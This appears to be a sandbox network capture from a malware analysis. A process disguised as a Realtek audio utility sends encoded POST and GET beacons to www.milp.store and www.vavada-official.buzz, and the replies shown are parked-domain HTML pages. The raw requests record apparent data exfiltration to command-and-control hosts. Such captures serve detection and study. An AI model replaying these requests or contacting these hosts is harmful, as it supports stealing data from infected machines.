                                                                                        Dec 12, 2024 21:54:17.536662102 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:54:17.536705971 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:54:17.536741972 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:54:17.536773920 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.11.2049717194.9.94.86807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:20.066692114 CET658OUTPOST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 38 6a 62 75 39 68 35 72 2f 77 68 4d 54 74 31 51 32 70 6d 6f 71 44 6c 2f 75 55 4f 63 74 59 4a 35 6a 6b 70 5a 63 50 55 4a 4b 74 30 47 61 5a 67 4f 79 55 41 54 69 4a 4a 59 2f 35 32 38 44 35 67 4d 31 69 51 65 39 32 38 31 70 55 39 57 71 63 6c 6c 33 65 76 4d 74 78 4b 4e 72 70 4b 44 61 72 30 54 52 43 45 4f 4b 52 49 79 4b 46 76 78 36 7a 42 59 43 59 65 55 69 47 68 4f 43 75 31 55 6b 6d 66 69 46 52 31 75 35 77 30 48 66 58 64 61 35 65 70 2f 30 4f 6c 36 33 67 2f 42 48 45 48 32 72 74 4d 32 61 71 57 72 6e 34 46 58 6c 56 4f 6e 41 3d
                                                                                        Data Ascii: Sb=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPm8jbu9h5r/whMTt1Q2pmoqDl/uUOctYJ5jkpZcPUJKt0GaZgOyUATiJJY/528D5gM1iQe9281pU9Wqcll3evMtxKNrpKDar0TRCEOKRIyKFvx6zBYCYeUiGhOCu1UkmfiFR1u5w0HfXda5ep/0Ol63g/BHEH2rtM2aqWrn4FXlVOnA=
                                                                                        Dec 12, 2024 21:54:20.296425104 CET1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:54:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:20.296483040 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        Dec 12, 2024 21:54:20.296525955 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:54:20.296570063 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:54:20.296606064 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:54:20.296643019 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.11.2049718194.9.94.86807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:22.820460081 CET2578OUTPOST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 6b 6a 62 63 31 68 34 4d 54 77 69 4d 54 74 38 77 32 6f 6d 6f 71 65 6c 2f 6d 59 4f 64 52 49 4a 36 62 6b 6f 38 41 50 57 38 6d 74 2b 47 61 5a 74 75 79 52 65 6a 69 6d 4a 62 58 6c 32 38 54 35 67 4d 31 69 51 63 6c 32 37 68 31 55 77 32 71 66 31 56 33 43 2b 38 74 5a 4b 4e 7a 35 4b 44 65 37 30 6a 78 43 45 75 61 52 4f 41 53 46 33 68 36 31 4d 34 43 51 65 55 2b 4a 68 4f 65 31 31 55 34 4d 66 6c 35 52 33 59 30 70 70 56 76 4d 50 4b 46 69 75 75 38 72 6b 35 6a 4d 36 79 66 2f 45 6c 37 7a 4c 51 53 68 65 64 6a 51 5a 56 5a 34 55 77 5a 56 4a 50 4b 53 6f 46 39 65 45 79 78 51 4f 37 4f 66 70 76 77 4b 61 30 43 71 69 58 36 53 52 79 61 34 66 6e 42 70 44 6e 58 52 39 46 6b 2b 2b 32 4a 6c 62 56 73 4c 59 69 4b 6b 37 2f 54 52 44 76 69 6c 5a 76 49 61 6c 75 70 72 6b 67 73 2b 6e 73 2b 31 32 4d 57 47 76 71 32 67 76 71 69 63 59 30 41 37 39 50 38 48 50 44 57 30 55 6a 74 6c 73 45 57 56 62 61 44 63 6c 6e 75 [TRUNCATED]
                                                                                        Data Ascii: Sb=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPmkjbc1h4MTwiMTt8w2omoqel/mYOdRIJ6bko8APW8mt+GaZtuyRejimJbXl28T5gM1iQcl27h1Uw2qf1V3C+8tZKNz5KDe70jxCEuaROASF3h61M4CQeU+JhOe11U4Mfl5R3Y0ppVvMPKFiuu8rk5jM6yf/El7zLQShedjQZVZ4UwZVJPKSoF9eEyxQO7OfpvwKa0CqiX6SRya4fnBpDnXR9Fk++2JlbVsLYiKk7/TRDvilZvIaluprkgs+ns+12MWGvq2gvqicY0A79P8HPDW0UjtlsEWVbaDclnuG2JdKtypTWrGg2yea7IqHTrhJSRO6zR9O2WSjKT2WDY9+0Dtedp8ewJh7hPMJPkBBHl/MeGj847grrf2FRsUFv+tmp0uiZ4CmG3XtUxMQ7KEHCkE+Xw2UYgmfycbr9n6LGd+hxzY6oeSr8DJ2I/zvV7Cq2evrHWRJimgxu+hI7o7bHVTPfVMF8vdSmiogd6zX7i/k6HPBrmCaXoBS2RYAae3ILGKqOpToozz79BpVjj4+eK9ZkJzm66S5Y9evekL+wzl4xie9dsSS1LLtUUJXiUdrl5Ilf/fteKodhNBagfxtFmlGdmFKYscjx1kxKZ0V2DNRc0uR+2T5H81Ec+NhXVncZeT6m89aCa0RZh0S7qDLHbR0nYupCtQ8EDrjtG7JUda/kf5xGDQ9Zq4nvQL8cdr1VmDXi5K6J63T5C8XnTo8oiHhUA4KhW8UYHNzljMZT+4NuLoCqvJl0r/NfTQLKS0vliO9rKDYQos8azS1K+djfX+L9l4VLMAvhONMUOlaCeGSQ19BuKG1QZfafczn7ssScmaOqMshwSiuX1Co8ySritZf6yJpKwUugrjSciN4X8xRV+3hiBQzxVSMe2GShyxeq24YnQZk6IqQRUSZdU1im2AW+SPxxz0yKJK5WcMeT/q+FAGpSZ9tTGLakZZD335fxF1LWcDa1 [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:22.820538998 CET5229OUTData Raw: 62 77 77 56 49 63 44 56 46 57 48 45 38 52 53 7a 42 75 35 65 43 70 6b 4b 74 71 54 38 47 56 39 4b 63 2b 4d 73 69 4b 2b 74 31 32 4a 65 4f 65 4c 6f 61 32 64 30 69 4e 31 44 55 4d 48 65 74 4e 32 46 75 4a 72 57 72 5a 4c 58 67 50 66 41 4d 4f 77 4c 65 56
                                                                                        Data Ascii: bwwVIcDVFWHE8RSzBu5eCpkKtqT8GV9Kc+MsiK+t12JeOeLoa2d0iN1DUMHetN2FuJrWrZLXgPfAMOwLeV/uzP36MAwlfv9do8OD4kvcyhKVpRY4GXMJQ9xIhRM4T0g7DfbLU8ZY2lPr21poKnOEQF1XaYCHbhy7hqUWMA0J4g6t9PzQysIm9WSN9habKuk8ooPHVNLLJm1iWJ1xa0gGtVDauVN/q5QkNapj8hrrlTgwU6bHFu9
                                                                                        Dec 12, 2024 21:54:23.051816940 CET1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:54:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:23.051830053 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        Dec 12, 2024 21:54:23.051840067 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:54:23.051850080 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:54:23.052042007 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:54:23.052053928 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.11.2049719194.9.94.86807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:25.570578098 CET380OUTGET /2j93/?Hsa=KVXAK1dJ22EyzD&Sb=Vzef3oWXaGELtgURWqqFi05KJy99TvY3Ax3n2w42PW1Tdv5T/46T0veVyj66+7X9h8HGTeoaGJDhn+MaRcWt91HqjtPUKRqQAZTb/tezorVLLvQhzmVaw3M= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:54:25.800872087 CET1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:54:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:25.800926924 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        Dec 12, 2024 21:54:25.800971985 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:54:25.801253080 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:54:25.801306963 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:54:25.801403999 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.11.2049720199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:31.063124895 CET668OUTPOST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
